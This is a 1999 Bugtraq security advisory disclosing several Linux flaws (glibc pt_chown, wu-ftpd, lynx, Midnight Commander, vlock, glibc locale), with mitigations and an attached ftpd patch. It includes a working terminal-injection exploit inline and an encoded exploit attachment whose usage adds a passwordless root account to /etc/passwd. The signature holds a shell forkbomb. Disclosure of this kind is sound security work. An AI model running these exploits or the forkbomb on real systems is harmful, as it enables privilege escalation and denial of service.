Date: Sun, 4 Jul 1999 13:38:48 +0200
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock / mc / glibc 2.0.x
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--8323328-1626411126-931088328=:355
Content-Type: TEXT/PLAIN; charset=US-ASCII
First of all, something less or more personal - sorry to all secure@...pl
people for this post. I'm really angry, as this stuff become well-known
without my knowledge... so, only a few of my own observations, always
trying to respect other's intellectual property.
All the best goes to el- :P
----------------------------------------------
glibc 2.1.x and Linux without devpts mechanism
----------------------------------------------
Compromise: locally, privledges of any user (including superuser) running
programs without devpts support compiled in after glibc
upgrade (like screen, mc etc).
Solution: chmod 700 /usr/libexec/pt_chown
There's a bug in pt_chown suid helper program, supplied with glibc 2.1.x
(tested on default RH 6.0 distro). This program is designed to allow
proper allocation of pseudo-terminals for non-suid programs in systems
with glibc 2.1.x installed, but without devpts support compiled into every
program (it's enough to have, let's say, screen which uses traditional
/dev/ptyXX and /dev/ttyXX scheme). Due to lack of security checks,
pt_chown can be easily fooled to gain full control over other user's (root
as well) pseudo-terminal, as allocated by screen, Midnight Commander, or
virtually any other program. All we need is an open descriptor to
/dev/ttyXX (in read or write mode, no matter) - while login uses secure
permissions, ttys allocated by eg. screen are 622 by default, so we could
gain write access. Then, we have to call pt_chown in a proper way to gain
ownership of this device, and put anything we want to the input stream of
process controlling this pty using TIOCSTI ioctl()...
Automated exploit code is attached (potfory.c). Sorry for polish comments,
should be readable anyway? If not, there's 'primal' exploit for this hole:
-- simpliest.c --
int main(int a,char* b[]) {
char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
int i=0,x=open(b[1],1); // Expect writable, allocated
// (eg. by screen) /dev/ttyXX as 1st arg
if (x<0) {
perror(b[1]);
exit(1);
}
if (!fork()) {
dup2(x,3);
execl("/usr/libexec/pt_chown","pt_chown",0);
perror("pt_chown");
exit(1);
}
sleep(1);
for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);
}
-- eof --
----------------------------
wu-ftpd 2.5, VR and BeroFTPD
----------------------------
Compromise: remote root
Solution: add strlen() check somewhere
There's an overflow in wu-ftpd 2.5 and prior releases (including VR and
BeroFTPD) in mapped_path when mapping current working directory to
command-line. While I discovered this vunerability by myself, I don't want
to provide exploit code, as all other, hard work has been done
independently by someone else. Instead of that, there's a .diff file with
patch, attached somewhere as ftpd.diff.
------------------
lynx and telnet://
------------------
Compromise: remote messing with files, maybe more?
Lynx has a problem coming from calling external programs to handle
protocols like telnet://. Example: attempt of viewing 'telnet://-n.rhosts'
URL will result in empty, new and shiny .rhosts file. Unfortunately, as
telnet client has session logging off by default, no idea how to put
something there?
------------------
mc, ftp:// and $()
------------------
Compromise: remote/local user's privledges
Midnight Commander ftp client has an overflow while reading server
responses - long enough message will result in beautiful overflow. Enjoy.
Also, mc seems to have serious problems with directories containing shell
commands enclosed in $(...) construction. Bad.
--------
vlock -a
--------
Compromise: locally, unlocking VCs switching under certain conditions
When 'vlock -a' is called, console switching is completely disabled using
ioctl() call on /dev/ttyX device. Under certain conditions, this
protection can be fooled. Let's imagine following situation: user X is
logged on tty6 - oh, abbandoned session ;) while root is playing on
other consoles. After some time, he/she issued 'vlock -a' and gone
somewhere. But, if user X is still logged on any console, and he's able to
login once more, remotelly, he could open /dev/tty6 (in our example, as
it's owned by him), then... use ioctl() (as it's not restricted to
superusers!!!) to enable console switching.
------------------------------
glibc 2.0.x and LC_ALL, noexec
------------------------------
Compromise: locally, doing thins you shouldn't be able to do ;)
First of all - doing /lib/ld-linux.so.2 /program/on/noexec/partition is
the simpliest way to bypass noexec option, if only you have glibc 2.0.x.
Nothing to say, security by obscurity stinks.
Clean glibc 2.0.x, as distributed in .tar.gz, are vunerable to rather
seriuos problem with LC_ALL containing '../' tricks (just like in telnetd
and TERM case). In fact, in some Linux distributions, it has been silently
fixed, while people upgrading glibc to eg. 2.0.7 'from scratch' are not
aware of this problem, and many sites are vunerable. Using prepared
directory with locale specifications, including glibc error messages used
eg. by perror(), luser will be able to for example read setuid programs
memory, etc.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
--8323328-1626411126-931088328=:355
Content-Type: TEXT/PLAIN; charset=ISO-8859-2; name="potfory.c"
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.9907041338480.355@nimue.ids.pl>
Content-Description:
Content-Disposition: attachment; filename="potfory.c"
DQovLyAjZGVmaW5lIExDQU1UVUZfSkVTVF9HTFVQSV9JX1NUUklQTkFMX0xJ
QkNfQQ0KLy8gcmVsZWFzZSAyLjANCg0KLyoNCg0KICBNYXJjaGV3IEh5cGVy
cmVhbCBJbmR1c3RyaWVzIC4gLiAuIC4gLiAuIC4gLiAuICBtYXJjaGV3QGRp
b25lLmlkcy5wbA0KICBTdHVtaWxvd3kgTGFzIFRlYW0gLiAuIC4gLiAuIC4g
LiAuIC4gLiAuIC4gMTAwbWlsb3d5QHdhcmlhY2kucGRpLm5ldA0KICANCiAg
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVsgUFJFU0VOVFMgXS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KCSAgICAgICAgICAgRCBPIE0g
RSBLICAgIE4gQSAgICBQIE8gVCBGIE8gUiBZDQogICAgICAgICAgICAgICBn
bHVwaSwgYWxlIHNrdXRlY3pueSBzcGxvaXQgbmEgZ2xpYmNlIDIuMQ0KICAg
ICAgICAgICAgICAgICANCiAgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bIChj
KSBsY2FtdHVmQGlkcy5wbCBdLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiAg
WTJLLWNvbXBhdGlibGUJCQkJCSAgICAgIDI0LzA1Lzk5DQoNCiAgVE9ETzog
dyBkb21rdSBuaWUgbWFtIGRldnB0c2ZzJ2EsIHdpZWMgbmllIG1hIHN1cHBv
cnR1LCBhbGUgenJvYmnqLA0KICAgICAgICBvYmllY3Vq6i4uLg0KDQogIFph
c2FkYSBkemlhs2FuaWE6IHdzcGFuaWGzeSB3eW5hbGF6ZWsgcHQuIHB0X2No
b3duLCB3IGt083J5DQogIHphb3BhdHJ6b25lIHOxIGdsaWJjZSAyLjEgKFJl
ZEhhdCA2LjApLCBwb3p3YWxhIHByemVqseYga29udHJvbOoNCiAgbmFkIHB0
eXNpYW1pIGlubnljaCB1c2Vy83cgaSBwcnpla2F6YeYgZG93b2xuZSBwb2xl
Y2VuaWEgcHJvZ3JhbW93aSwNCiAga3TzcnkgbmEgdHltIHB0eXNpdSB3aXNp
LiBXYXJ1bmVrOiBuYSBzdGFyY2llIG11c2lteSBtaWXmIGpha2m2DQogIGRv
c3TqcCBkbyBwdHlzaWEgKCtyIGFsYm8gK3cpLCB0YWsgc2nqIHNrs2FkYSC/
ZSBwcm9ncmFteSB0eXB1DQogIHNjcmVlbiwgbWMgaXRwIGRharEgbmFtIHN6
YW5z6i4gT2N6eXdptmNpZSBzZW5zIHcgdb95d2FuaXUgdGVnbw0KICBwcm9n
cmFtaWt1IG5hIHB0eXNpZSByb290J2EgaSB3eXOzYW5pdSBkb3dvbG5lZ28g
cG9sZWNlbmlhIGRvDQogIGplZ28gc2hlbGxhLg0KDQogIE5hanByb3N0c3p5
IHByenlrbGFkIHW/eWNpYTogb2RwYWxhbXkgc3Bsb2l0YSBuYSByb290YSwg
Y3pla2FteSBhvw0KICBydXQgc2llIHphbG9ndWplIGkgb2RwYWxpIGNvcyB3
IHN0eWx1IHNjcmVlbmEgaSBidW0uIFW/eXdhbmllIG5hDQogIGlubnljaCB1
c2VydWYgY2h5YmEgbmllIG1hIHdp6mtzemVnbyBzZW5zdSwgcG96YSB0eW0g
amW2bGkgc2NyZWVuDQogIG5pZSBtYSBzdWlkYSwgcG8gcHJvc3R1IHRyYWNp
bGliebZteSB6Ynl0IGR1v28gY3phc3UgbmEgdXN0YWxlbmllDQogIGRvIGtv
Z28gbmFsZb95IHB0ebYsIHdp6mMgc3Bsb2l0IG1vv2UgbmllIHphZHppYbNh
5i4gVyB0YWtpbQ0KICBwcnp5cGFka3UgZG9waXNhbmllICcjZGVmaW5lIE5B
TE9UX1pNQVNPV0FOWSAxJyBpIHd5d2+zYW5pZSBzcGxvaXRhDQogIGRsYSBy
b290YSBzcG93b2R1amUgd3lzebNhbmllIGtvbWVuZHkgbmEga2G/ZGVnbyBw
dHlzaWEsIGJleg0KICBzcHJhd2R6YW5pYSBjenkgdG8gbnAuIHezYbZuaWUg
bmllc3VpZG93eSBzY3JlZW4uDQoNCiAgTmllIHNwaWVzenkgc2nqIG5pa29t
dSwgd2nqYyAvZGV2L3R0eT8/IHOxIHNrYW5vd2FuZSBjbyAxMCBzZWt1bmQu
DQogIEpltmxpIGt0b7YgY2hjZSwgbmllY2ggc29iaWUgem1pZW5pIExBRyBn
ZHppZbYgbmm/ZWouIFByb2dyYW0gaSB0YWsNCiAgamVzdCBkbyB6b3N0YXdp
ZW5pYSBuYSBkemll8SA6UA0KDQogIEdyaXR6OiBFbENhLCAxMDBtaWxvd3ks
IGxhbTNyeiwgTmlzZXMsIHNvcGVsLCBtYXJ0aW5leiwgTmVyZ2FsLCBldGMu
DQoNCiovDQoNCi8vICNkZWZpbmUgTkFMT1RfWk1BU09XQU5ZIDENCg0KI2Rl
ZmluZSBNQVNLQV9QVFlTSUEJMDYyMg0KI2RlZmluZSBMQUcJCTEwDQoNCiNp
bmNsdWRlIDxzeXMvdGltZS5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPGRpcmVudC5oPg0KI2luY2x1ZGUgPHN5cy9mY250bC5oPg0K
I2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5o
Pg0KI2luY2x1ZGUgPHN5cy9zaWduYWwuaD4NCiNpbmNsdWRlIDxzeXMvaW9j
dGwuaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxwd2QuaD4N
CiNpbmNsdWRlIDxzdHJpbmcuaD4NCg0KI2RlZmluZSBCT0xEICAiXDAzM1sw
MDswMW0iDQojZGVmaW5lIE5PUk0gICJcMDMzWzAwOzAwbSINCiNkZWZpbmUg
REFSSyAgIlwwMzNbMDA7MDJtIg0KI2RlZmluZSBCTElOSyAiXDAzM1swNW0i
DQojZGVmaW5lIEdSRUVOICJcMDMzWzAxOzMybSINCiNkZWZpbmUgUkVEICAg
IlwwMzNbMDE7MzFtIg0KI2RlZmluZSBZRUxMICAiXDAzM1swMTszM20iDQoj
ZGVmaW5lIEJMVUUgICJcMDMzWzAwOzM2bSINCg0KI2lmZGVmIExDQU1UVUZf
SkVTVF9HTFVQSV9JX1NUUklQTkFMX0xJQkNfQQ0KIyAgZGVmaW5lIHN0YXQo
YSxiKSBfeHN0YXQoX1NUQVRfVkVSLGEsYikNCiMgIGRlZmluZSBmc3RhdChh
LGIpIF9meHN0YXQoX1NUQVRfVkVSLGEsYikNCiNlbmRpZiAvKiBMQ0FNVFVG
X0pFU1RfR0xVUElfSV9TVFJJUE5BTF9MSUJDX0EgKi8NCg0KaW50IGd1cGlf
dWlkOw0KY2hhciogamVidW07DQoNCg0Kdm9pZCB6dXp5Y2llKHZvaWQpIHsN
CiAgcHJpbnRmKEJPTEQgIlNwb3PzYiB6db95Y2lhOiAiIEJMVUUgIi4vcG90
Zm9yeSBqdXplciAncG9sZWNlbmllJ1xuIik7DQogIHByaW50ZihCT0xEICIg
ICAuLi5qdXp1YWxseTogIiBCTFVFICIuL3BvdGZvcnkgcm9vdCAnZWNobyBc
InI6OjA6MDo6LzovYmluL3NoXCIiDQogICAgICAgICAgICAgICIgPj4vZXRj
L3Bhc3N3ZDtsb2dvdXQnIiBOT1JNICJcblxuIik7DQogIGV4aXQoMCk7DQp9
DQoNCg0KaW50IHN6dWthal91aWRhKGNvbnN0IGNoYXIqIGxvZ2luKSB7DQog
IHN0cnVjdCBwYXNzd2QqIHB3Ow0KICBzZXRwd2VudCgpOw0KICB3aGlsZSAo
KHB3PWdldHB3ZW50KCkpKSBpZiAoIXN0cmNhc2VjbXAobG9naW4scHctPnB3
X25hbWUpKSByZXR1cm4gcHctPnB3X3VpZDsNCiAgcHJpbnRmKCBSRUQgIlsr
XSBXIGRvbWt1IG5pZSBtaWVzemthIG5pa3QgbyBsb2dpbmllICclcycuLi4i
IE5PUk0gIlxuXG4iLGxvZ2luKTsNCiAgZXhpdCgwKTsNCn0NCg0KDQpjaGFy
KiBrb25pZWM9IlxuIjsNCg0KaW50IG9id2FjaGFqX3B0eXNpYShzdHJ1Y3Qg
ZGlyZW50ICpzKSB7DQogIGludCBpLHEseix3Ow0KICBzdHJ1Y3Qgc3RhdCBh
Ow0KICBpZiAoc3RybGVuKHMtPmRfbmFtZSkhPTUgfHwgc3RybmNtcCgicHR5
IixzLT5kX25hbWUsMykpIHJldHVybiAtMTsNCiAgY2xvc2UoKGk9b3Blbihz
LT5kX25hbWUsT19SRE9OTFkpKSk7DQogIGlmIChpPjApIHJldHVybiAtMTsJ
Ly8gQmxhaCwgdW51c2VkIHB0eS4uLg0KICBzLT5kX25hbWVbMF09J3QnOwkv
LyBwdHkgLT4gdHR5DQogIHByaW50ZihEQVJLICJbK10gUHJ6eWdssWRhbSBz
aeogIiBZRUxMICIlcyIgREFSSyI6ICIgQkxVRSxzLT5kX25hbWUpOw0KICBz
dGF0KHMtPmRfbmFtZSwmYSk7DQogIGlmIChhLnN0X3VpZCE9Z3VwaV91aWQp
IHsNCiAgICBwcmludGYoIm5pZSB0ZW4gb3duZXIgKCVkKS5cbiIsYS5zdF91
aWQpOw0KICAgIHJldHVybiAtMTsNCiAgfQ0KICBwcmludGYoIm93bmVyIGRv
YnJ5Iik7DQogIGEuc3RfbW9kZT1hLnN0X21vZGUmMDY2NjsNCiAgaWYgKGEu
c3RfbW9kZSE9TUFTS0FfUFRZU0lBKSB7DQojaWZuZGVmIFpNQVNPV0FOWV9B
VEFLDQogICAgcHJpbnRmKCIsIGFsZSBjaHliYSB0byBwb215s2thIChtYXNr
YTogJW8pLlxuIixhLnN0X21vZGUpOw0KICAgIHJldHVybiAtMTsNCiNlbHNl
DQogICAgcHJpbnRmKCIgKHptYXNvd2FueSBuYWxvdCkiKTsNCiNlbmRpZiAv
KiBaTUFTT1dBTllfQVRBSyAqLw0KICB9DQogIGk9b3BlbihzLT5kX25hbWUs
T19XUk9OTFkpOw0KICBpZiAoaTwwKSB7DQogICAgcHJpbnRmKCIsIGFsZSBu
aWUgbWFtIHVwcmF3bmll8S5cbiIpOw0KICAgIHJldHVybiAtMTsNCiAgfQ0K
ICBwcmludGYoIiAtICIgWUVMTCAicm9iaW15IHN3b2plIVxuIiBOT1JNKTsN
Cg0KICBpZiAoIShxPWZvcmsoKSkpIHsNCiAgICBkdXAyKGksMyk7DQogICAg
ZXhlY2woIi91c3IvbGliZXhlYy9wdF9jaG93biIsInB0X2Nob3duIiwwKTsN
CiAgICBleGl0KDEpOw0KICB9DQoNCiAgd2FpdHBpZChxLCZ6LDApOw0KDQog
IGZzdGF0KGksJmEpOw0KDQogIGlmIChhLnN0X3VpZCE9Z2V0dWlkKCkpIHsN
CiAgICBwcmludGYoIlsrXSBFY2gsIGNvtiBuaWUgd3lzerNvIHogcHRfY2hv
d24nZW0gOihcbiIpOw0KICAgIGNsb3NlKGkpOw0KICAgIHJldHVybiAtMTsN
CiAgfQ0KDQogIHByaW50ZihZRUxMICJbK10gT2tpLCB0cnp5bWFteSBwdHlz
aWEgemEgamFqYSwgtmxlbXkga29tZW5k6i4uLlxuIik7DQoNCiAgZm9yICh3
PTA7dzxzdHJsZW4oamVidW0pO3crKykgaW9jdGwoaSxUSU9DU1RJLCZqZWJ1
bVt3XSk7DQogIGZvciAodz0wO3c8c3RybGVuKGtvbmllYyk7dysrKSBpb2N0
bChpLFRJT0NTVEksJmtvbmllY1t3XSk7DQoNCiAgY2xvc2UoaSk7DQoNCiAg
cHJpbnRmKCJcbiIgR1JFRU4gIkR6aeprdWplbXkgemEgbG90IHogTWFyY2hl
dyBIeXBlcnJlYWwgSW5kdXN0cmllcyA6LSkiIE5PUk0gIlxuXG4iKTsNCg0K
ICBleGl0KDApOw0KfQ0KDQoNCg0Kdm9pZCByb2JpbXlfYnVyZGVsKHZvaWQp
IHsNCiAgc3RydWN0IGRpcmVudCAqKng7DQogIGludCBhOw0KICBwcmludGYo
QkxVRSAiWytdIEN6ZWthbSBuYSBvZmlhcmUgWy9kZXYvdHR5Pz9dIC0gc3By
YXdkemFtIGNvICIgWUVMTCAiJWQiIEJMVUUgIiBzZWt1bmQuLi5cbiIsDQog
ICAgICAgICBMQUcpOw0KICBpZiAoY2hkaXIoIi9kZXYiKSkgew0KICAgIHBy
aW50ZiggUkVEICJbK10gS2kgYnVyYWssIG5pZSBtb2fqIHdlarbmIGRvIC9k
ZXYuLi5cblxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KICB3aGlsZSAoMSkg
ew0KICAgIGE9c2NhbmRpcigiLiIsJngsb2J3YWNoYWpfcHR5c2lhLDApOw0K
ICAgIGlmIChhPDApIHsNCiAgICAgIHByaW50ZiggUkVEICJbK10gQnV1dWss
IG5pZSBtb2fqIHByemVza2Fub3dh5iAvZGV2Li4uXG5cbiIpOw0KICAgICAg
ZXhpdCgwKTsNCiAgICB9DQogICAgc2xlZXAoTEFHKTsNCiAgfQ0KfQ0KDQoN
CmludCBtYWluKGludCBhcmdjLGNoYXIqIGFyZ3ZbXSkgew0KICBwcmludGYo
QkxVRSAiXG5NYXJjaGV3IEh5cGVycmVhbCBJbmR1c3RyaWVzICIgQk9MRCAi
b3JheiAiIEdSRUVOICJTdHVtaWxvd3kgTGFzIFRlYW0iDQoJIEJPTEQgIiBw
cmV6ZW50dWqxOlxuIik7DQogIHByaW50ZiggWUVMTCBCTElOSyAiRG9tZWsg
TmEgUG90Zm9yeSAiIE5PUk0gIi0gZ3VwaSwgYWxlIHNrdXRlY3pueSBzcGxv
aXQgbmEgZ2xpYmNlIDIuMVxuIik7DQogIHByaW50ZiggREFSSyAiU2NlbmFy
aXVzeiwgd3lzdHLzaiB3bup0cnogaSBtdXp5a2E6ICIgQk9MRCAiPGxjYW10
dWZAaWRzLnBsPlxuIik7DQogIGlmIChhcmdjLTMpIHp1enljaWUoKTsNCiAg
Z3VwaV91aWQ9c3p1a2FqX3VpZGEoYXJndlsxXSk7DQogIGplYnVtPWFyZ3Zb
Ml07DQogIHByaW50ZihCTFVFICJbK10gVUlEICIgWUVMTCAiJWQiIEJMVUUg
IiwgcG9sZWNlbmllIGRvIHByemVrYXphbmlhIHNoZWxsb3dpOiAiIEJPTEQg
IiVzXG4iLA0KICAgICAgICAgZ3VwaV91aWQsamVidW0pOw0KICByb2JpbXlf
YnVyZGVsKCk7DQogIHByaW50ZihOT1JNICJcbiIpOw0KICBleGl0KDApOw0K
fQ0K
--8323328-1626411126-931088328=:355
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ftpd.diff"
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.9907041338481.355@nimue.ids.pl>
Content-Description:
Content-Disposition: attachment; filename="ftpd.diff"
KioqIGZ0cGQuYwlTdW4gSnVuICA2IDE1OjIwOjIxIDE5OTkNCi0tLSBmdHBk
X3BhdGNoZWQuYwlTdW4gSnVuICA2IDE1OjE1OjAzIDE5OTkNCioqKioqKioq
KioqKioqKg0KKioqIDEyNDUsMTI1MSAqKioqDQogICAgICAgIC8qIGFwcGVu
ZCB0aGUgZGlyIHBhcnQgd2l0aCBhIGxlYWRpbmcgLyB1bmxlc3MgYXQgcm9v
dCAqLw0KICAgICAgICBpZiggIShtYXBwZWRfcGF0aFswXSA9PSAnLycgJiYg
bWFwcGVkX3BhdGhbMV0gPT0gJ1wwJykgKQ0KICAgICAgICAgICAgICAgIHN0
cmNhdCggbWFwcGVkX3BhdGgsICIvIiApOw0KISAgICAgICBzdHJjYXQoIG1h
cHBlZF9wYXRoLCBkaXIgKTsNCiAgfQ0KICANCiAgaW50DQotLS0gMTI0NSwx
MjU0IC0tLS0NCiAgICAgICAgLyogYXBwZW5kIHRoZSBkaXIgcGFydCB3aXRo
IGEgbGVhZGluZyAvIHVubGVzcyBhdCByb290ICovDQogICAgICAgIGlmKCAh
KG1hcHBlZF9wYXRoWzBdID09ICcvJyAmJiBtYXBwZWRfcGF0aFsxXSA9PSAn
XDAnKSApDQogICAgICAgICAgICAgICAgc3RyY2F0KCBtYXBwZWRfcGF0aCwg
Ii8iICk7DQohICAgICAgIGlmICggc3RybGVuKG1hcHBlZF9wYXRoKSArIHN0
cmxlbiAoZGlyKSA8IDQwOTUgKQ0KISAgICAgICAgICAgICAgIHN0cmNhdCgg
bWFwcGVkX3BhdGgsIGRpciApOw0KISAgICAgICBlbHNlIA0KISAgICAgICAg
IHN5c2xvZyhMT0dfRVJSLCAiRlRQIG1hcHBlZF9wYXRoIGF0dGFjayAiKTsN
CiAgfQ0KICANCiAgaW50DQo=
--8323328-1626411126-931088328=:355--
